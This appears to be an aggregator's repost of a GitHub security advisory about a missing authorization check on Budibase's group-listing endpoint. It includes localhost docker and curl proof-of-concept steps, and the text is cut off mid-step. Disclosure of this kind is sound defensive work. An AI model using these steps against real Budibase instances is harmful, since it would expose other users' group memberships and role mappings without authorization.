CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

GHSA-4qcj-m5wp-jmf4: Budibase: Missing RBAC on GET /api/global/groups allows BASIC users to enumerate all tenant groups and role mappings

mediumCVSS 4.3
Summary The GET /api/global/groups endpoint on the worker service has no role-based authorization middleware. Any authenticated user (including BASIC role) can enumerate all user groups in the tenant, including their role mappings, user memberships, builder permissions, and the isDefault flag. Steps to Reproduce 1. Start Budibase docker run -d --name budibase-poc -p 10000:80 \ -e MINIO_ACCESS_KEY=minio_access -e MINIO_SECRET_KEY=minio_secret \ -e INTERNAL_API_KEY=internal_api_key -e JWT_SECRET=jwt_secret_test \ -e API_ENCRYPTION_KEY=api_enc_key_test123456 \ -e BB_ADMIN_USER_EMAIL=admin@test.com \ -e BB_ADMIN_USER_PASSWORD=TestPassword123! \ budibase/budibase:latest until curl -sf http://localhost:10000/health; do sleep 5; done 2. Login as admin, create a user group, create a BASIC user Login as admin curl -s -c /tmp/bb_admin.txt -X POST http://localhost:10000/api/global/auth/default/login \ -H "Content-Type: application/json" \ -d '{"username":"admin@test.com","password":"TestPassword123!"}' Create a user group (requires license with user groups feature, or use Budibase Cloud) On self-hosted without license, groups may not be available If available: curl -s -b /tmp/bb_admin.txt -X POST http://localhost:10000/api/global/groups \ -H "Content-Type: application/json" \ -d '{"name":"Secret Admin Group","color":"#ff0000","icon":"AdminPanelSettingsIcon","roles":{"app_abc123":"ADMIN"}}' Create a BASIC user (no builder, no admin) curl -s -b /tmp/bb_admin.txt -X POST http://localhost:10000/api/global/users \ -H "Content-Type: application/json" \ -d '{"email":"basic@test.com","password":"BasicPass123!","roles":{},"admin":{"global":false},"builder":{"global":false}}' 3. Login as BASIC user and enumerate all groups (the vulnerability) Login as BASIC user curl -s -c /tmp/bb_basic.txt -X POST http://localhost:10000/api/global/auth/default/login \ -H "Content-Type: application/json" \ -d '{"username":"basic@test.com","password":"BasicPass123!"}' List ALL groups (should

Details

Source
GitHub Security Advisories (INTL · database · site)
Severity
medium — CVSS 4.3
Published
2026-07-24
Last updated
2026-07-24
Exploitation
Not in CISA KEV at last sync

Original advisory: https://github.com/advisories/GHSA-4qcj-m5wp-jmf4

More from GitHub Security Advisories